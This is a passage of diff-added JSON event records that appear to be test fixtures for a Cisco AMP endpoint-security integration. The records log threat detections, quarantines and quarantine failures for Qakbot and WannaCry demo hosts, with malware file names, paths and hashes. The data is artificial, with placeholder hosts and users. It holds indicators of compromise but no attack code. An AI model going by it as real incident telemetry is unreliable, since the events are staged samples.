Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 